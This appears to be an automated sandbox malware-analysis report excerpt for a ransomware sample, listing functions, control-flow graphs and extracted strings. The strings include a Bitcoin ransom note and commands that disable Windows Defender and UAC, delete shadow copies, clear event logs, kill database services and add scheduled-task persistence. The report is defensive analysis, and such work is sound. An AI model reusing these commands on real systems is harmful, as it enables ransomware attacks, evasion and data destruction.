                                          • GetConsoleWindow.KERNEL32 ref: 009DC1B9
                                          • ShowWindow.USER32(00000000,00000000), ref: 009DC1C2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Window$ConsoleShow
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.PBF$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$INW15$Lpath$Manual_Mini_Config$Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$user$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$w#G!$Z0
                                          • API String ID: 3999960783-2274752431
                                          • Opcode ID: fd8f35c180d480d717c8999034446d30a91a26113efc279831ff68231624e475
                                          • Instruction ID: fb3cbf17f72a9a797766971ba756c42851a9757d9474c4f01ef6baa80daa69d2
                                          • Opcode Fuzzy Hash: fd8f35c180d480d717c8999034446d30a91a26113efc279831ff68231624e475
                                          • Instruction Fuzzy Hash: 96D2B170E00298AADB25F765CD56BED77789F91300F4481E9A44A672D3EF702F48CB92
                                          Function 009B92A0 Relevance: 62.7, APIs: 1, Strings: 34, Instructions: 1466COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4744 9b92a0-9b9340 call 9e6c20 * 2 4749 9b9342-9b934c call 9e6c20 4744->4749 4750 9b9351-9b93a0 call 9e12d0 * 2 call 9eb790 4744->4750 4749->4750 4758 9b94eb-9b95bc call 9e9b40 call 9e80d0 * 2 4750->4758 4759 9b93a6-9b93db call a58400 4750->4759 4778 9b95be-9b95d3 4758->4778 4779 9b95f3-9b961d 4758->4779 4765 9bac48 call 9e8080 4759->4765 4766 9b93e1-9b9442 call a58400 call 9e9b40 4759->4766 4771 9bac4d call a65132 4765->4771 4780 9b94ae-9b94b4 4766->4780 4781 9b9444-9b944d 4766->4781 4777 9bac52 call a65132 4771->4777 4791 9bac57 call 9e8080 4777->4791 4783 9b95e9-9b95f0 call a40c3c 4778->4783 4784 9b95d5-9b95e3 4778->4784 4785 9b961f-9b9634 4779->4785 4786 9b9654-9b9680 4779->4786 4780->4758 4793 9b94b6-9b94cb 4780->4793 4789 9b944f-9b9464 4781->4789 4790 9b9484-9b94ab 4781->4790 4783->4779 4784->4777 4784->4783 4794 9b964a-9b9651 call a40c3c 4785->4794 4795 9b9636-9b9644 4785->4795 4787 9b9686-9b968e 4786->4787 4788 9b9a44-9b9a8f call 9e6c20 4786->4788 4798 9b9690-9b9697 4787->4798 4811 9b9ab1-9b9b1e call 9e9de0 call 9e80d0 4788->4811 4812 9b9a91-9b9aac call 9e6c20 * 2 4788->4812 4799 9b947a-9b9481 call a40c3c 4789->4799 4800 9b9466-9b9474 4789->4800 4790->4780 4809 9bac5c call a65132 4791->4809 4803 9b94cd-9b94db 4793->4803 4804 9b94e1-9b94e8 call a40c3c 4793->4804 4794->4786 4795->4777 4795->4794 4798->4788 4807 9b969d-9b96a3 4798->4807 4799->4790 4800->4771 4800->4799 4803->4771 4803->4804 4804->4758 4807->4798 4813 9b96a5-9b96e3 call a58980 call 9e3b00 4807->4813 4820 9bac61 call a65132 4809->4820 4834 9b9b20-9b9b35 4811->4834 4835 9b9b55-9b9b64 4811->4835 4812->4811 4832 9b96e9-9b9754 call 9f0210 4813->4832 4833 9b9953-9b9960 4813->4833 4828 9bac66 call a65132 4820->4828 4836 9bac6b-9bac70 call a65132 4828->4836 4857 9b980a-9b9834 call 9eb8d0 4832->4857 4858 9b975a 4832->4858 4837 9b9962-9b9964 4833->4837 4838 9b9966-9b998a call 9e7930 call a61daa 4833->4838 4842 9b9b4b-9b9b52 call a40c3c 4834->4842 4843 9b9b37-9b9b45 4834->4843 4839 9b9b88-9b9be1 call 9e9de0 call 9e80d0 4835->4839 4840 9b9b66-9b9b70 4835->4840 4847 9b998d-9b999e call 9e7a00 4837->4847 4838->4847 4880 9b9be3-9b9bf8 4839->4880 4881 9b9c24-9b9c3d 4839->4881 4849 9b9b72-9b9b79 4840->4849 4842->4835 4843->4828 4843->4842 4870 9b99ca-9b9a40 call 9e47b0 call a28cbf 4847->4870 4871 9b99a0-9b99c5 call 9b3740 4847->4871 4849->4839 4854 9b9b7b-9b9b81 4849->4854 4854->4849 4860 9b9b83 4854->4860 4877 9b991b-9b9922 4857->4877 4878 9b983a-9b989b call 9eb8d0 * 2 4857->4878 4864 9b9760-9b9767 4858->4864 4868 9b9c74-9bab47 call 9e9de0 call 9e80d0 * 32 call 9e6dc0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9b49c0 * 37 call a58980 call 9e1e80 call 9ea1e0 call 9e1e40 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1bd0 call a58980 call 9e3980 call 9e9470 call 9e3910 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call 9e1bd0 call a58980 call 9e3980 call 9e9470 call 9e3910 call a65282 4860->4868 4865 9b979b-9b97ae call 9e6950 4864->4865 4866 9b9769-9b976b 4864->4866 4897 9b97b0-9b97b6 4865->4897 4898 9b97e7-9b97ee 4865->4898 4873 9b976d-9b9774 4866->4873 4874 9b9796-9b9798 4866->4874 5132 9bab49-9bab50 4868->5132 5133 9bab81-9bac47 call 9bae10 call 9e1ac0 call 9b49c0 call 9bae10 call 9e1ac0 call 9b49c0 call 9bad10 call 9b49c0 * 10 call a405bb 4868->5133 4870->4788 4871->4870 4883 9b9783-9b9787 4873->4883 4884 9b9776-9b977c 4873->4884 4874->4865 4877->4833 4888 9b9924-9b9933 4877->4888 4878->4791 4924 9b98a1-9b98e1 call 9e6c20 call a61d0c 4878->4924 4890 9b9bfa-9b9c08 4880->4890 4891 9b9c0e-9b9c1c call a40c3c 4880->4891 4881->4868 4885 9b9c3f-9b9c54 4881->4885 4906 9b978c-9b978f 4883->4906 4884->4883 4893 9b977e-9b9781 4884->4893 4894 9b9c6a-9b9c71 call a40c3c 4885->4894 4895 9b9c56-9b9c64 4885->4895 4899 9b9949-9b9950 call a40c3c 4888->4899 4900 9b9935-9b9943 4888->4900 4890->4836 4890->4891 4891->4881 4893->4906 4894->4868 4895->4836 4895->4894 4910 9b97b8-9b97bf 4897->4910 4911 9b97d3-9b97d7 4897->4911 4907 9b97f2-9b9804 call 9f0210 4898->4907 4899->4833 4900->4820 4900->4899 4906->4874 4916 9b9791-9b9794 4906->4916 4907->4857 4907->4864 4910->4911 4918 9b97c1-9b97d1 4910->4918 4921 9b97dc-9b97df 4911->4921 4916->4865 4918->4921 4921->4898 4926 9b97e1-9b97e5 4921->4926 4935 9b98e3-9b98f5 4924->4935 4936 9b9915-9b9918 4924->4936 4926->4907 4938 9b990b-9b9912 call a40c3c 4935->4938 4939 9b98f7-9b9905 4935->4939 4936->4877 4938->4936 4939->4809 4939->4938 5132->5133 5134 9bab52-9bab6e call 9e1bd0 call 9e1660 call a65282 5132->5134 5147 9bab73-9bab7c call 9e1ac0 5134->5147 5147->5133
                                          APIs
                                          • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009B9A38
                                            • Part of subcall function 00A61D0C: DeleteFileW.KERNEL32(?,?,009B98D8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A61D14
                                            • Part of subcall function 00A61D0C: GetLastError.KERNEL32(?,009B98D8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 00A61D1E
                                            • Part of subcall function 00A61D0C: __dosmaperr.LIBCMT ref: 00A61D25
                                          Strings
                                          • l, xrefs: 009BAB19
                                          • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 009B9A4F
                                          • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 009BAB33
                                          • \AppData\S-8459.vbs, xrefs: 009BA9F1
                                          • a5m6f, xrefs: 009B9822, 009B9845
                                          • " Xinfecter.exe , xrefs: 009B9E99, 009BA2C9
                                          • kaj3n, xrefs: 009B9865, 009B9BA1
                                          • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 009BAA24
                                          • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 009BAADA
                                          • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 009BAB52
                                          • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 009BA0A9
                                          • (goto secttwo:sectonIF EXIST , xrefs: 009BA165
                                          • w#G!, xrefs: 009B92B7
                                          • (goto secthree):akakak, xrefs: 009BA7A3
                                          • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 009B9D39
                                          • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 009BA771
                                          • " /fo csv 2>NUL | find /I ", xrefs: 009B9C8D, 009B9FF9
                                          • ):secttwotasklist /fi "ImageName eq , xrefs: 009B9F49
                                          • \AppData\S-2153.bat, xrefs: 009BAAA7
                                          • \AppData\S-6748.bat, xrefs: 009B955D
                                          • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 009B9C77
                                          • rem a5m6f, xrefs: 009B9B8B
                                          • w#G!, xrefs: 009BA7AE, 009BA7F5
                                          • :\Users\ReadMe.hta", xrefs: 009B9ACB
                                          • rem, xrefs: 009B92F4
                                          • slow, xrefs: 009B9344
                                          • )IF NOT EXIST , xrefs: 009BA375
                                          • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 009BA7D1
                                          • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 009B9AA4
                                          • Xinfecter.exe" (IF EXIST ", xrefs: 009BA425
                                          • (start /d , xrefs: 009BA529
                                          • :\Users\, xrefs: 009B94EB, 009BA9C7, 009BAA7D
                                          • Xinfecter.exe" (start /d , xrefs: 009B9DF3, 009BA215
                                          • Xinfecter.exe, xrefs: 009B9686, 009B9B66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                          • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow$w#G!$w#G!
                                          • API String ID: 969238624-4175406912
                                          • Opcode ID: ccf03af2e6e6268ec2764d5bf26d935981bd0e3d9dc78a84fd9adbd32f3197a9
                                          • Instruction ID: 97b2ed7df03a6182794ae6a531a7187b68a7475dd74193e40d912f967d5c2564
                                          • Opcode Fuzzy Hash: ccf03af2e6e6268ec2764d5bf26d935981bd0e3d9dc78a84fd9adbd32f3197a9
                                          • Instruction Fuzzy Hash: D5F28970D10258CEDB25DF64CE55BEEBBB4AF95304F0042D9E10967292EBB4AB88CF51
                                          Function 009DD08F Relevance: 58.5, APIs: 1, Strings: 32, Instructions: 777COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5178 9dd08f-9dd0f0 call 9e11a0 call a58980 call 9e37b0 call 9e9130 call 9e3740 5189 9dd0f9-9dd1f1 call a58980 call 9c5e60 call 9f5c80 call a58980 call 9de5b0 call a58980 call 9de750 call 9e0230 call 9f2590 call 9e0230 call 9f23c0 5178->5189 5190 9dd0f4 call 9bb040 5178->5190 5213 9dd1f7-9dd200 5189->5213 5190->5189 5213->5213 5214 9dd202-9dd26e call 9b7e30 call 9e1b10 call 9e1ac0 call 9e1360 * 2 5213->5214 5225 9dd270-9dd279 5214->5225 5225->5225 5226 9dd27b-9dd291 call 9e1a90 5225->5226 5229 9dd297-9dd2a0 5226->5229 5229->5229 5230 9dd2a2-9dd2c1 call 9c3f00 5229->5230 5233 9dd2c6-9dd2cf 5230->5233 5233->5233 5234 9dd2d1-9dd30a call 9e95d0 call 9e1b10 call 9e1ac0 5233->5234 5241 9dd310-9dd319 5234->5241 5241->5241 5242 9dd31b-9dd37f call 9e1c10 call 9b7e30 call 9e1b10 call 9e1ac0 call a58980 5241->5242 5252 9dd384-9dd396 call 9e37b0 5242->5252 5254 9dd39b-9dd525 call 9e8f40 call 9e9580 call 9e9470 call 9b3730 call 9e1ac0 * 2 call 9e3740 call 9e10a0 call 9e10c0 call 9ea4d0 call a58980 5252->5254 5277 9dd52a-9dd53c call 9e37b0 5254->5277 5279 9dd541-9dd663 call 9e9490 call 9e9470 call 9e1ac0 call 9e9490 call 9e9470 call 9e1ac0 call 9e3740 call 9e1c10 call 9c4670 call 9e9b40 call 9e9c10 call 9e9ad0 call 9b49c0 * 2 call a58980 5277->5279 5309 9dd668-9dd67a call 9e3b00 5279->5309 5311 9dd67f-9dd70a call 9b3730 call 9e3a90 5309->5311 5317 9dd71b-9dd72c call 9e12d0 call 9d1c90 5311->5317 5321 9dd731-9dd825 call 9bac80 call 9b49c0 call 9e1ac0 * 2 call 9bb040 call 9e1ac0 call 9bb040 call 9e1ac0 * 5 call 9b7d70 call 9c6020 * 2 5317->5321 5352 9dd82e-9dd891 call a58980 call 9b76c0 call 9f1ba0 call 9e1260 call 9e0e90 5321->5352 5353 9dd829 call 9bb040 5321->5353 5364 9dd8a3-9ddba9 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 10 call 9e1bd0 call 9e1660 call a65282 call 9e1bd0 call 9e1660 call a65282 call 9e9de0 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e11d0 call 9b49c0 * 8 call 9e90a0 5352->5364 5365 9dd893-9dd89e call 9e1170 5352->5365 5353->5352 5457 9ddbaf-9ddbc0 call 9bf5e0 5364->5457 5458 9ddd17-9ddd28 call 9e90a0 5364->5458 5365->5364 5465 9de4a4-9de5a2 call 9b8780 call 9e1ac0 * 3 call 9b49c0 call 9b78d0 call 9b49c0 * 2 call 9e1ac0 * 8 call 9b49c0 * 3 call 9e1ac0 call a405bb 5457->5465 5466 9ddbc6-9ddcb7 call 9e9b40 call 9e9c10 call 9e9ad0 call 9e9c10 call 9e9ad0 call 9e9c10 call 9b49c0 * 5 call 9e1090 * 2 call a659c6 5457->5466 5463 9ddd2e-9de0a3 call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 5458->5463 5464 9de450-9de461 call 9e90a0 5458->5464 5658 9de0a9-9de41e call 9b5130 * 2 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9e0e30 call 9e12d0 call 9ea750 call 9ea940 call 9b5330 5463->5658 5659 9de434 5463->5659 5477 9de491 5464->5477 5478 9de463-9de478 call 9cdaf0 * 2 5464->5478 5569 9ddcb9-9ddd00 call 9e9c70 call 9e11d0 call 9b49c0 call 9e1090 * 2 call a659c6 5466->5569 5570 9ddd03-9ddd12 call 9b49c0 5466->5570 5481 9de491 call 9cf570 5477->5481 5478->5465 5501 9de47a-9de48f call 9cdaf0 * 2 5478->5501 5488 9de496-9de49d 5481->5488 5488->5465 5493 9de49f 5488->5493 5493->5465 5498 9de49f call 9cf570 5493->5498 5498->5465 5501->5465 5569->5570 5570->5465 5752 9de424 call 9b5240 5658->5752 5660 9de43a call 9b5240 5659->5660 5662 9de43f-9de445 5660->5662 5664 9de449 call 9b5240 5662->5664 5666 9de44e 5664->5666 5666->5465 5753 9de429 5752->5753 5754 9de42f call 9b5240 5753->5754 5754->5659
                                          APIs
                                            • Part of subcall function 009BB040: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BB0E7
                                            • Part of subcall function 009BAE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 009BAE81
                                          • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 009DD89E
                                            • Part of subcall function 00A659C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00A659D3
                                            • Part of subcall function 00A659C6: GetLastError.KERNEL32 ref: 00A659DD
                                            • Part of subcall function 00A659C6: __dosmaperr.LIBCMT ref: 00A659E4
                                          Strings
                                          • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 009DD91F
                                          • \AppData\N-Save.sys, xrefs: 009DD622
                                          • Z0, xrefs: 009DD1D1
                                          • If You Want To Restore Them Email Us : , xrefs: 009DDA80
                                          • u4g8, xrefs: 009DD541
                                          • U, xrefs: 009DD6E8
                                          • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 009DDA6D
                                          • .PBF, xrefs: 009DD4E5, 009DD4F2, 009DDC42
                                          • alfons, xrefs: 009DD609
                                          • Telegram , ID :, xrefs: 009DD893
                                          • c, xrefs: 009DDB8F
                                          • Second Email :, xrefs: 009DD869
                                          • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 009DDA49
                                          • Dflt, xrefs: 009DDB9D
                                          • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 009DD985
                                          • h2gq, xrefs: 009DD57E
                                          • p2h6, xrefs: 009DD3B9, 009DD481
                                          • <html><head><title>, xrefs: 009DD8A8
                                          • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 009DDAB2
                                          • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 009DD8BB
                                          • n7t0, xrefs: 009DD3A6, 009DD46E
                                          • INW15, xrefs: 009DD8D4, 009DDA68, 009DDBDE
                                          • _Mail-, xrefs: 009DDBF7
                                          • file, xrefs: 009DDB98
                                          • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 009DE4A4
                                          • <span class="spnn">, xrefs: 009DD953
                                          • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 009DD8ED
                                          • c, xrefs: 009DDD09
                                          • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 009DDB1C
                                          • :\Users\, xrefs: 009DD5ED
                                          • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 009DDA1B
                                          • _[ID-, xrefs: 009DDBC6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296959389.0000000000AD6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296979786.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9b0000_xKvkNk9SXR.jbxd
                                          Similarity
                                          • API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
                                          • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.PBF$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$INW15$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$user$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
                                          • API String ID: 4082941153-3611061756
                                          • Opcode ID: b0f5fd596d27f961935796709de5821ad2803ba40e105c55d0c4b5e5893d583c
                                          • Instruction ID: 98b0b2cbdbcf9649c1e74496d0f1e2174c345dc2ad154f91f609ad9b7a2fefd0
                                          • Opcode Fuzzy Hash: b0f5fd596d27f961935796709de5821ad2803ba40e105c55d0c4b5e5893d583c
                                          • Instruction Fuzzy Hash: 56727F70D051989EDB15E760DD52BEDB7B8AF61304F4484E8A44A63293EF706F88CF62
                                          Function 009C4670 Relevance: 22.2, APIs: 5, Strings: 7, Instructions: 1165COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowTextLengthA.USER32(?), ref: 009C5327
                                          • GetWindowTextA.USER32(?,00000000,00000001), ref: 009C53F9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.3296814853.00000000009B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                          • Associated: 00000000.00000002.3296791281.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296894823.0000000000A93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296924722.0000000000ACF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.3296942401.0000000000AD1000.00000008.00000001.01000000.00000003.sdmpDownload File
